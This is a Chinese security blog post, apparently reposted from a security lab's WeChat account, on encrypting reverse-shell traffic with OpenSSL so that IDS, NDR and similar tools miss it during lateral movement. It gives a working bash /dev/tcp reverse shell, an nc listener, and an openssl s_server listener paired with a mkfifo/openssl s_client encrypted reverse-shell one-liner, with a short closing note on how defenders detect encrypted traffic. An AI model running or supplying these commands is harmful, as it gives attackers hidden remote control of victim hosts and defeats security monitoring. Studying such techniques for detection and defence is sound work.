nc监听反弹shell之加密流量

admin 2022年5月23日02:16:56评论162 views字数 1018阅读3分23秒阅读模式



网安引领时代,弥天点亮未来   






 

nc监听反弹shell之加密流量

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!



nc监听反弹shell之加密流量

0x01背景描述

在攻防对抗过程中的横行渗透,经常需要反弹反向shell操作,如果反弹 shell过程中流量是明文传输,那么内网环境中已有的安全检测产品(WAF/IPS/IDS/NDR/HIDS)等防护软件会进行流量检测,明文传输带有明显的攻击特征。很快会被检测发现,防守方对攻击流量回溯分析,就会阻断攻击行为。

nc监听反弹shell之加密流量

 

nc监听反弹shell之加密流量

0x02明文流量

反弹shell命令

bash -i>& /dev/tcp/10.211.55.7/12388 0>&1

nc监听反弹shell之加密流量

nc监听命令

nc.exe -l -p 12388

nc监听反弹shell之加密流量

通信过程由受害主机发起

nc监听反弹shell之加密流量

通过Wireshark抓包分析流量,整个通信过程全部为明文传输。

过滤tcp端口

tcp.port == 12388

追踪tcp数据流

nc监听反弹shell之加密流量

以明显看到操作行为。

nc监听反弹shell之加密流量

nc监听反弹shell之加密流量

0x03加密流量

通过使用OpenSSL流量加密。

1.生成OpenSSL证书,这里使用默认参数

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

nc监听反弹shell之加密流量

2.设置监听端口(使用生成的证书)

openssl s_server -quiet -key key.pem -cert cert.pem -port 12388

nc监听反弹shell之加密流量

3.反弹shell命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.211.55.7:12388 > /tmp/s; rm /tmp/s

nc监听反弹shell之加密流量

4.通过Wireshark抓包分析流量,整个通信过程全部为加密传输。

过滤端口,发现使用tls加密

nc监听反弹shell之加密流量


nc监听反弹shell之加密流量




nc监听反弹shell之加密流量

0x04思考

安全的本质就是对抗!针对加密流量的检测,传统的基于特征的检测已经无法满足攻击发展的趋势,只有通过不断引入新的检测思考才能解决。

加密流量的检测,业界主流有2种方法:

第一种是将加密流量进行解密并进行检测,这需要安全检测设备充当通信双方的代理或者由客户提供单独的解密证书(只能针对该证书对应的加密流量进行解码)

第二种是在不解密的情况下进行安全检测,这通常会采用(AI)机器学习的方法。

当然对攻击行为的感知,也可以通过威胁狩猎发现。




nc监听反弹shell之加密流量 

知识分享完了

喜欢别忘了关注我们哦~



学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

nc监听反弹shell之加密流量


原文始发于微信公众号(弥天安全实验室):nc监听反弹shell之加密流量

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月23日02:16:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nc监听反弹shell之加密流量http://cn-sec.com/archives/1039878.html

发表评论

匿名网友 填写信息